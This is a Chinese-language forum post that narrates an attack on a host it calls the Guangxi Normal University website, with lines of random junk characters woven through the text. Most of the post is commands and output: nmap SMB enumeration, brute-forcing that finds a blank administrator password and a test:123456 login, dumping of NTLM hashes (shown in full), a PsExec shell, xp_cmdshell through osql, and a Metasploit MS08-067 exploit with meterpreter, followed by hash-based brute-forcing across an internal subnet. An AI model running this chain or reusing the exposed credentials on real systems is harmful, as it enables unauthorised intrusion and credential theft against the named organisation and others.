广西师范网站http://202.103.242.241/. B, j3 N' G3 B$ `
$ Y$ K* z' c9 Nroot@bt:~# nmap -sS -sV 202.103.242.241: {3 ^- Q/ D& [& ?$ w7 K3 o
+ O9 p$ C" O1 N; B
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
# c9 q) f- P( `9 v3 G! x0 R% R {
4 C: m, r# l8 |, Q6 gNmap scan report for bogon (202.103.242.241)& R( U7 o$ ?/ G. i5 L" r
( k- ]/ `" i4 f/ Z* o1 w. mHost is up (0.00048s latency).2 c# V/ R" q1 O
d7 c8 F0 E8 C }0 r- a, ^
Not shown: 993 closed ports
- U$ }2 ]3 ~" u+ f7 Q( U1 W" |0 K' O; u7 h) N7 l' I
PORT STATE SERVICE VERSION* J: y/ ]% @; {" S, u Y8 q9 W
+ L) ~: G+ h j. y+ E1 d+ t135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
Z* s, ?- E0 M( k0 Y: `6 \9 s; ^- G3 Q
139/tcp open netbios-ssn s7 Y& A+ F: ]! c, @: G# n
0 a! E( w/ S! E- d: v4 ]( X445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
. S/ D1 G7 L/ h B+ N
8 p( ~% ?6 J3 p7 I1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)' \0 H0 E. T% j' l3 j) o" P! Q' X4 I/ v
; d; h! ~' u) b6 D) r R1026/tcp open msrpc Microsoft Windows RPC
9 v" v: I0 i, A& F2 k+ L/ E x! Y( J' t' ^2 m; @0 h
3372/tcp open msdtc?5 t7 [& M/ r0 o. |9 T) l+ P( j
0 s7 I, x% O- c+ Q( L$ I: l& ~6 e
3389/tcp open ms-term-serv?
$ B& f$ Q* J3 R$ I6 p
( k5 Q3 ~: f# g {: `3 ?1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :* u: ^% O7 _3 j5 b6 q. ? e0 a7 }
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r0 G6 I& j! Z) {( k
4 L { T- Q) i/ D1 vSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
' ^0 k. ~! }# q% S7 J0 U! j3 m; E) \/ H0 p, \, V
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)" h0 \- s4 i5 y, `% i
" ~: A8 A% h& Y8 l, \; @4 ASF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO/ g, n f" X- e2 F3 }
4 ~1 t, @3 Z3 D5 j1 BSF:ptions,6,”hO\n\x000Z”);
- C! ?2 X# I2 D# G4 j4 {8 C' o2 W" g
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)1 t/ Z( ~& d0 {
6 _/ ?) }& u+ [- t% A
Service Info: OS: Windows! `6 ^# E' b t" S' T" O
a1 C# _( X! ~1 J- J, E! iService detection performed. Please report any incorrect results at http://nmap.org/submit/ .
" B1 g+ A# D6 O, g
, ^' Z; i0 L& s! r3 q0 c8 p2 UNmap done: 1 IP address (1 host up) scanned in 79.12 seconds/ u b0 b; Z# S, x3 c/ L9 f
/ A0 i4 o A2 x' W- R4 |
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
- m8 y! Y2 E. D! S& f. T& `' `& X6 Z7 B; h8 |6 m! u3 {
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse! r* S% T u* r
- [! a* j4 `4 A8 {- v
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse- @& |" f6 K* b
, g2 v4 R; x9 [" o i, }-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
* F6 r& b0 U0 b+ S0 ^! Y( h1 R. H
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
S% P' Y% J4 q
[. S ~" m' ]2 d9 d$ ]! h-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse" }& M; p4 Q3 L& j I9 n
+ ~9 Z) m1 r# v5 O& H
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse3 k# J7 j+ Q9 W8 K" n3 P5 {, r
9 C' A" a5 y# x& v% ]: ^. N
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse+ l* p! m' V. n. B/ E
; W! v. M9 v% S4 Q# `6 W. K-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse: {5 l' ]- M2 {8 X, \
. d; k+ c( J/ _1 b: O2 C
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse$ C6 P9 O! m$ C; q, Z
6 M9 a3 B' f A" S-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse% x) e- b/ e+ U1 k5 F+ C
9 \! d3 s2 j* }* W* Q# \
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse3 I" o# ]6 g) b% t0 s
* X( U J6 ?+ d9 ?-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse7 ?* B* U I8 a7 L# G
" p6 c0 V, e- Q9 M1 p-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse# i6 x3 n, U9 U0 b7 Y5 i
( d6 o" m7 ^3 i' `, D% U# m-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
% P$ L5 ~) l; m1 s
* H- S9 i7 t% a* E-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse4 X; w0 m/ d+ }( a" ~3 C5 b/ {5 K+ @
/ b6 p" e- P5 B) ~) S
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 - I, f, _* z0 X# \
2 d: Y$ m3 l4 f//此乃使用脚本扫描远程机器所存在的账户名8 C/ o8 T) s3 \1 c
( Z& N B' A! }4 \
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST5 J4 U: R9 v8 p/ X2 }4 W
" t2 J: }$ t5 ]8 X4 |7 }. m
Nmap scan report for bogon (202.103.242.241)
+ i( H. X+ N. e" z0 K. W; A" \) h2 d7 C6 I) o& }0 g8 k) [: x
Host is up (0.00038s latency).
G+ l6 `$ M9 U: S6 e3 ]0 a
; f; x* B$ h$ _: }. p9 @Not shown: 993 closed ports7 M- ?! K" g5 G( o: T
9 v; x) I" o' F
PORT STATE SERVICE/ t. \) P) @- z7 E0 C
) {( y& x1 w# _$ g8 ^: a& Z135/tcp open msrpc
1 r [& y; W. d1 v7 P, n3 |+ o
+ E1 |, c b! A" x6 p139/tcp open netbios-ssn
6 q8 `1 P! x; ?2 w2 t
2 E# g8 ]) O8 [+ c$ ]* \2 U8 J445/tcp open microsoft-ds
0 Z# J/ \6 E9 o0 y. b! x$ X" S# y1 N; N2 q; J& ^, r) w/ g1 E. o
1025/tcp open NFS-or-IIS6 n! T0 }8 M7 }' L) `
; F5 o* a& z m+ Y1026/tcp open LSA-or-nterm
$ f8 R3 L) ^. ?( i1 H' ^
* O- \/ { U8 k& D) X* G, |3372/tcp open msdtc
. B+ ^- a8 X% S+ ~- h h1 t
9 V" W* r! q7 Q( h" @3389/tcp open ms-term-serv! C7 a1 Y" W3 Q% S( k
g8 V* k: ~6 E$ R5 v% k
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems). V8 j: R5 Q8 P+ f8 Z) @
0 c1 W" |& } J8 i7 C
Host script results:
* t% ~% I1 J0 _8 E2 r& \* M" J( B
- I9 {% O1 Q4 P6 ~7 G8 B( F| smb-enum-users:
1 [% D$ X; w: J# ^) i. J' g$ p6 Z$ M, i" g$ C
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
+ ^9 g. }* T5 b, J% `6 ?0 T- U) J
& Y5 V7 j+ t+ r. h2 t+ ^2 tNmap done: 1 IP address (1 host up) scanned in 1.09 seconds! E+ ]4 [! ?5 w8 |4 e' e
9 U) _2 s1 d9 g4 s6 w- _; Nroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
+ C. g. @5 {9 p R$ [# }+ Y- ~! @: I* j: C1 G- j% p1 \9 Y: N! u5 p
//查看共享$ M3 w0 R! |8 p. d9 Q5 f
/ P8 e5 K* K" _+ v% S9 n2 sStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST+ H4 [/ H1 ^, E2 v) a
4 @% \* g' }6 x2 m" RNmap scan report for bogon (202.103.242.241)7 ^1 ?. m4 {$ |7 M: q
. q- { y( l. ~& I* a1 C# P
Host is up (0.00035s latency).
' N, P. M$ Q t3 Q( D. C% m/ x5 @' Q
+ P- W0 W" J8 I I+ lNot shown: 993 closed ports
6 C" j# l2 } K1 q) I0 H; i/ k0 |, V! Y, [
PORT STATE SERVICE
4 f' k( X* i6 V' o, T4 m" Z0 j$ f5 e: [8 ?5 @+ z, j
135/tcp open msrpc6 _& I. ]2 a J7 X5 o, @
* e4 i; s# D3 D* y/ o139/tcp open netbios-ssn
' f: s v3 s& I% M% Q# j
, B! _/ x0 e( i5 r N/ w445/tcp open microsoft-ds; B+ _9 |9 r9 |; [4 @, p. H
4 W6 D, X- | w S# s5 t
1025/tcp open NFS-or-IIS
7 K1 b; e* G+ s$ A$ Y: |
- J% r2 e$ w; s) W0 Q% _1026/tcp open LSA-or-nterm
; y0 \: M) E1 \
- |' r- d$ b/ }0 q3372/tcp open msdtc+ e/ _5 n+ l" f2 {) K) }
) I4 F) b# e* Y g6 ?. h1 `
3389/tcp open ms-term-serv4 U) U5 a& F' D
8 Z9 D. ]1 l9 @. H1 Q
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
& S8 c: r2 ]: P7 g) J+ H
" v0 y4 N1 S; R1 j, S; v- _# RHost script results:% d8 |. D9 Q7 V: \/ C1 F1 Q1 M
1 _0 W( l d2 Z8 E R1 @
| smb-enum-shares:9 i; }- ^5 i5 A% g0 I7 w/ E7 O2 x
( c2 g; Y. P1 d0 G: g' Y
| ADMIN$
8 \. i" [: E' F. F; C0 k2 {* c
5 R6 G# H3 Y$ x' D1 q| Anonymous access: <none>
% B6 C1 X: L' T# w7 {
+ }( k: C0 G* ~" V/ a| C$
, _* S# Z: c1 v2 N' X% e
* b7 d3 h. P, M, a+ }6 J. X" q/ s| Anonymous access: <none>& F9 r' v! p& B: g* c
3 c1 b; d( v" L6 o6 h| IPC$
8 P. R2 P) \7 @; w" C0 j) H! G0 V* R# `8 B+ U- P5 y; P _
|_ Anonymous access: READ8 R" j$ N: l5 F: `! h2 ~. |
2 W$ w. t/ Z+ C P4 JNmap done: 1 IP address (1 host up) scanned in 1.05 seconds* P# B/ i4 b$ c, K- A8 u* T
, i% j, P& I4 g. A& _/ o
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
- m7 O& _6 f2 s9 G( T* s
3 L6 n3 q9 }3 C/ m: ^+ }8 M//获取用户密码; H X2 M! R! _6 U- P
$ T6 X6 Q) \+ T/ H$ A+ AStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
3 R8 e% H+ E. }% v1 c; J0 [# _2 d" ~1 s; L' ~. ?
Nmap scan report for bogon (202.103.242.2418)
) ]* T+ C) Y) G* @7 R8 v1 ~0 F
- ]' g# P# ~3 R, P" FHost is up (0.00041s latency).
8 q/ t1 L' j# U5 ]# K+ v1 h" j% k) M3 C' z! m7 [1 p7 v9 s7 m/ h
Not shown: 993 closed ports4 g$ `5 J) M- w x% ]) D# N
; C' B( E! G+ K' ZPORT STATE SERVICE
! W& K5 C) C# z- a3 x. n
* ]$ |$ D$ p: ^135/tcp open msrpc
: g+ M1 Z* l# v# \7 G1 k- W9 m2 I! |1 _$ b4 Z" W
139/tcp open netbios-ssn6 n0 x( T% g$ Z% r/ D; R0 O
8 F3 P& n1 M5 ?/ z8 B2 J$ r
445/tcp open microsoft-ds
. M4 i7 d) G7 X
1 P! f8 Y# p* u2 ^# l1025/tcp open NFS-or-IIS3 I, S% n# J$ F( v3 ^* N1 U
. {% M: N( V7 G1 V5 N% I9 |
1026/tcp open LSA-or-nterm9 c. t4 q1 K7 ^. ]. G! N3 _" x
9 v" Q0 H5 ]3 w' C1 P3372/tcp open msdtc
1 Y! D( F! m N
3 O. y% m$ |3 [4 p/ W# f8 W3389/tcp open ms-term-serv) i9 L+ M( s8 |5 ^, _
5 G2 l0 i. w' N! E5 Y
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
2 W" c1 F: r& v5 O1 h' t, V0 n/ l6 N+ L# E; i& ?
Host script results:
! Q4 V6 c6 o5 u6 A1 U7 z$ n
: f; V4 L5 ?( j% V| smb-brute:
q. e# b+ i" D% J9 t8 z! W. r/ v
administrator:<blank> => Login was successful
& V: r' o8 ^3 \8 {, P! U. ~. N( G' i z6 O* B& i, l% x& Z( o G R& q
|_ test:123456 => Login was successful
& T- i* W8 d3 B7 E9 |( G( F3 @8 N) l) `% H; g, A" G/ E8 H5 s
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds }5 a1 \: b8 U9 c
/ b, e" ~" i+ I7 d& r
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash. y1 [/ b0 `3 v3 ^$ [
! c4 s9 j# u/ U$ d0 Lroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
* Q+ {% M$ [7 O; U/ S
]$ [( w( k R5 G4 k4 Froot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse- j S/ E; W9 r- f
! k/ G9 `# T, m s/ v8 v9 [
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
, N' l8 I- H+ [7 r
9 ^0 i6 R1 F! o5 ~) vStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST4 k2 @2 `5 \% H1 K7 ?# T
) F* S! B1 `! TNmap scan report for bogon (202.103.242.241)
) ~& n- @$ d2 o% r8 J( F) d! D- Y$ |0 m; c4 C& P, W, t: t8 V3 R4 ?
Host is up (0.0012s latency).3 M+ x9 H7 k7 c7 Q1 r/ s
/ ?) L+ h. X9 F! X( K+ C7 V2 {
PORT STATE SERVICE; Y7 Q; P) E, N' L
; I) x* H4 e" m
135/tcp open msrpc
^2 C8 o7 [" a* L) v$ J* Y8 M& u* P, I* v% R6 C* @8 @
139/tcp open netbios-ssn
/ `; Q4 q1 l) m' h+ q( }: C* `% K( h
445/tcp open microsoft-ds
, R) G5 Z0 c1 O6 u) X! ]1 U- u! M% ?/ F: D( i- U, D) v
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)/ J3 \- t) |2 r6 R8 W+ j+ h
" W4 w$ _; Z" jHost script results:5 m: H+ U% T, p4 l7 t ]
: n1 r' X. S% p5 v& g5 b| smb-pwdump:7 e' X* e9 o, C b. a0 X9 a p! X
3 i! I0 D( B7 l4 o( F0 b9 }; p| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************% X# f7 A- M- z1 L
: G3 P7 G4 I5 z0 f8 p3 O/ G! ?- A8 N
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************4 F* v! y! k. W. \: P* B
% k) c" ?) u4 Z; g. A' O8 \| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4+ Y+ e, @( g& `; q: r4 P
$ ~/ p, `& M. e0 ]
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2& b5 y* _/ @' R1 L# J
. F; `# A) b! A# W4 M
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
. Y! Y2 n8 t8 H4 z" L3 Z( l
8 _( }" f4 ^/ w3 {C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
. y8 V' F" g8 u5 P, C3 \
, Z V; s( O# p. C1 @% s* m: R3 [-p 123456 -e cmd.exe1 ?$ h2 ~% S$ B1 {
( E! z/ Q" Q8 }: t% a5 APsExec v1.55 – Execute processes remotely
" a% f5 `6 r- s5 n2 Z! v0 W% J
, Z& A8 \, ]" U- H, @8 }2 DCopyright (C) 2001-2004 Mark Russinovich
* {: P$ [, y* D! ^- E4 y3 ^, q0 H/ t1 O. j: N# x& J- X
Sysinternals – www.sysinternals.com. H: _( o, [4 c6 q
" x4 W% F" z1 ~5 h3 U7 d
Microsoft Windows 2000 [Version 5.00.2195]
0 e0 r, O& Y. P- K& w6 n+ e3 m# l$ S# X* p2 V( c1 q
(C) 版权所有 1985-2000 Microsoft Corp.
6 J6 c$ s& |8 i0 f. R+ S: z) ~8 R* o$ h
C:\WINNT\system32>ipconfig
6 Y3 J U/ A* b! \& O% p, n
; z$ Q+ E* N3 n% B8 ^' t$ t, R" E* IWindows 2000 IP Configuration
( B) _ b+ F! R( f$ g' }
$ }4 |; L* L/ U7 IEthernet adapter 本地连接:
2 l3 H: e8 z. y `: B5 k: \' W7 m! J4 D4 u' Z
Connection-specific DNS Suffix . :
* k- e W/ h# M9 y+ J/ o9 q
5 A- A! u1 u, k- W4 s* I7 mIP Address. . . . . . . . . . . . : 202.103.242.241
; L0 V3 R& y/ l" S o5 G* V* x3 ~6 g9 h; ~! `/ X" p
Subnet Mask . . . . . . . . . . . : 255.255.255.02 [2 t2 T3 O* \. d
6 @6 X8 \% d) b8 `1 H7 [Default Gateway . . . . . . . . . : 202.103.1.1
3 W a5 V; ~6 Q5 ?! h0 l0 v/ p, O4 N9 x- q% k
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令- e3 A; c; R8 K: B3 j4 H$ x* E
" N' O) I/ ?$ n3 v$ N" `* ]% G
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞" z, b3 O% Z/ C. Q V- W6 n# `) J" D
3 Q) j! y0 M. u, Z" U" wStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST7 v. \; |4 n9 A, x/ E8 E
. T+ I x, r$ R/ U: J; BNmap scan report for bogon (202.103.242.241)
$ G- T7 Y( E. T% N# U( U* C6 D6 S6 Y/ T1 _
Host is up (0.00046s latency).
" b# N; f5 \' |* I' [8 n
, A& C8 x2 a5 ^2 f4 W% FNot shown: 993 closed ports
; ^5 h8 G1 r% ^3 k8 k2 v7 e- k+ h. n9 N" N# T9 `& O
PORT STATE SERVICE
8 d0 ^4 o& Q; t/ ?0 e& @& J( w- ^. ?3 a0 e `
135/tcp open msrpc0 m3 Q# i0 M7 ^
4 p) o, N% X# _1 A9 \% e! a" H139/tcp open netbios-ssn' I, `" }, }7 Y
4 s/ l' @; w" K: w/ g445/tcp open microsoft-ds o# w! ?, c# Q4 D3 F+ @
$ Z1 U0 S& V+ v0 b3 w4 l/ I1025/tcp open NFS-or-IIS
- s0 ]" \- _7 i! N% a* f7 Z T& r# v* r- i0 G' U2 {
1026/tcp open LSA-or-nterm, t& L, W5 J. N; L: n Q
: w+ N$ I" d4 [) y& c) J/ T6 z0 `
3372/tcp open msdtc
9 u+ A" Z6 m' ]) F1 |' T% M- E& [& j' W4 ?/ v5 J
3389/tcp open ms-term-serv
, h5 h; \- C. [- a* K0 u7 W" g6 T. \( ?" Q4 U! t- z$ \/ ^' p
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)7 |6 s Z$ _( Y( H# e6 {
- _7 k8 {6 o+ E, XHost script results:: `: F. d2 u/ s0 W: ~
$ u i8 F1 V3 l# F: I
| smb-check-vulns:, w8 z# X! c6 U5 M8 z" X
: C- I$ _$ o. m3 }$ C& k! ^( S|_ MS08-067: VULNERABLE
$ k# Z) Y0 ~/ i0 c# S& a$ p6 S: Q( H6 G) ~- M+ y0 P
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
" J9 z! o, K' y/ R2 Z, e* t% @
* s# [& g5 t4 @- U. L% Troot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出% I, {* q7 T- F; {2 |6 ?0 O
: `* w1 R* _8 H! v- Smsf > search ms08
1 r# N, e5 n8 n( j# I. Z7 v- p& u% N4 h* _! q5 W
msf > use exploit/windows/smb/ms08_067_netapi
9 f Y. N5 I7 ]* `
/ `# {0 u; @6 Nmsf exploit(ms08_067_netapi) > show options
7 _7 e! Y: V! F! N- b1 y
/ B0 l7 f! a' `3 V( J: Xmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241$ g$ ]2 Q0 B S' O2 @
4 D$ `- I9 v' D: F( v6 Rmsf exploit(ms08_067_netapi) > show payloads
( E* P! |8 }# ^; _6 h& k; H/ {/ p/ L) H0 j+ ^6 c7 f
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp7 X$ w* X9 w3 w8 H/ |" g
* P+ X% h; `7 xmsf exploit(ms08_067_netapi) > exploit& O4 F) e/ W- f/ L
2 A. k7 Z6 A. |
meterpreter >) e0 {1 S5 q; B. @4 T
: ~+ T7 v m! ?0 g& G+ Y& R* H1 r
Background session 2? [y/N] (ctrl+z)
+ R3 O) R9 R! P& ^- B. D8 d
/ p8 D0 [ \6 m$ L9 umsf exploit(ms08_067_netapi) > sessions -l3 Z8 b) \( P, P6 e m: W8 \3 G0 H
, t/ v; w! h1 d% `3 b7 v Nroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt/ A" F% y% u" s$ U
) W: F* m# J# c6 [" R( [
test
; {2 v% o# G. d2 j7 D# J) R% q0 ?2 W T- ]; Z8 P& M
administrator
1 K% R* ?7 ?9 _+ O4 Z" {: ~/ N6 i/ H5 E! T( A* d
root@bt:/usr/local/share/nmap/scripts# vim password.txt
+ F3 q( K' s( e' ^2 d
7 L4 i/ I3 Z( N, w44EFCE164AB921CAAAD3B435B51404EE
" O1 K1 g. r8 b, Y: n& t5 X; _. Z7 Q3 }8 ?. R- j1 U- r9 V
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 ) r$ W! i+ p4 l- y4 P' \
% f/ @+ \$ m# W/ k& |/ l k6 K/ n( g
//利用用户名跟获取的hash尝试对整段内网进行登录
7 F8 w! u' e& ~0 c- T* `+ L3 ^$ q- {8 R8 h/ I' u
Nmap scan report for 192.168.1.105( W& Z& c: I2 G% D5 s9 t/ U9 g
/ }! p, J- v; U7 ?) |3 e
Host is up (0.00088s latency).
+ \( G& E2 W: |
$ X8 D1 K. H% [9 N" x$ |Not shown: 993 closed ports0 C( G/ Q; b$ R
. s* b! b! o; j& X% E GPORT STATE SERVICE/ E" u. o! c1 ]
! W2 O8 E6 g" d2 o" C135/tcp open msrpc0 z/ Y0 o$ n3 b0 K
+ ^* }; ]3 m! K139/tcp open netbios-ssn1 a# z( _; V3 r$ C7 c, f' Y5 G
/ n/ V4 z" e3 n445/tcp open microsoft-ds! h0 F5 Z: F9 M- ]" [- ^
% N% x2 b; L- v1 Y' W& n0 b
1025/tcp open NFS-or-IIS2 o( _2 z8 u8 q( \
5 b' s7 t& o+ B
1026/tcp open LSA-or-nterm% w) ?# ^. Q, j5 e4 D# v9 K
- ~9 z& }2 P" v2 }3372/tcp open msdtc" ~/ P# {3 ^7 T/ Y" W/ D
- S6 B, S) n* a8 u# V! u) B! g
3389/tcp open ms-term-serv8 k( A( A( y* d2 E
5 Z6 z g) e9 I& \( |
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
% b+ G; `, [" v( z5 z( X' o) F2 X
* o6 k6 a9 T t1 ~7 U/ ?Host script results:% C, k% T2 s4 D- u7 j0 r
/ O' F3 n) h: d$ Z| smb-brute:
0 \. P! E- Z* W3 h3 g
5 t o% b! `+ {; \5 ]- ]* }8 g|_ administrator:<blank> => Login was successful
3 `* F4 a9 q* K! G, ^( d: ^+ j2 T. V3 ^ C
攻击成功,一个简单的msf+nmap攻击~~·
; a- C% W; Z+ s% E2 U4 E7 p
$ n) M( d+ Q% E |
发表于 2012-12-4 12:46:42
收藏
支持
反对